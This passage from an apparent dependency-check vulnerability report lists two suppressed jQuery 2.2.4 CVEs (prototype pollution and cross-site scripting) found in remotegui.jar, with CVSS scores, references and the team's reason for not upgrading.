- OSSIndex - <https://github.com/jquery/jquery/issues/3371>
- OSSIndex - <https://github.com/jquery/jquery/pull/2916>
- OSSIndex - <https://github.com/jquery/jquery/pull/3134>
- OSSIndex - <https://www.sonatype.com/products/sonatype-guide/oss-index-users>

#### Vulnerable Software & Versions (OSSINDEX):

- cpe:2.3:a:org.webjars:jquery:2.2.4:\*:\*:\*:\*:\*

#### **CVE-2019-11358** (OSSINDEX) suppressed

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable \_\_proto\_\_ property, it could extend the native Object.prototype.

Sonatype's research suggests that this CVE's details differ from those defined at NVD. See <https://ossindex.sonatype.org/vulnerability/CVE-2019-11358> for details

CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Notes: file name: remotegui.jar: jquery.min.js - We can not yet upgrade to a newer version due to dependencies. We do, however, not directly use the functionality that is being CVEd

#### CVSSv3:

- MEDIUM (6.0999999904632568)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

#### References:

- OSSINDEX - [\[CVE-2019-11358\] CWE-1321](#)
- OSSIndex - <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11358>
- OSSIndex - <https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/>
- OSSIndex - <https://github.com/cbeust/testng/issues/2150>
- OSSIndex - <https://github.com/jquery/jquery/pull/4333>
- OSSIndex - <https://www.sonatype.com/products/sonatype-guide/oss-index-users>

#### Vulnerable Software & Versions (OSSINDEX):

- cpe:2.3:a:org.webjars:jquery:2.2.4:\*:\*:\*:\*:\*

#### **CVE-2020-11023** (OSSINDEX) suppressed

In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: file name: remotegui.jar: jquery.min.js - We can not yet upgrade to a newer version due to dependencies. We do, however, not directly use the functionality that is being CVEd

#### CVSSv3:

- MEDIUM (6.0999999904632568)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

#### References:

- OSSINDEX - [\[CVE-2020-11023\] CWE-79: Improper Neutralization of Input During Web Page Generation \('Cross-site Scripting'\)](#)
- OSSIndex - <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11023>

- OSSIndex - <https://github.com/advisories/GHSA-jpcq-cgw6-v4j6>
- OSSIndex - <https://jquery.com/upgrade-guide/3.5/>
- OSSIndex - <https://www.sonatype.com/products/sonatype-guide/oss-index-users>

Vulnerable Software & Versions (OSSINDEX):

- cpe:2.3:a:org.webjars:jquery:2.2.4:\*.~\*~\*~\*~\*~\*~\*

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This report may contain data retrieved from the [Sonatype OSS Index](#).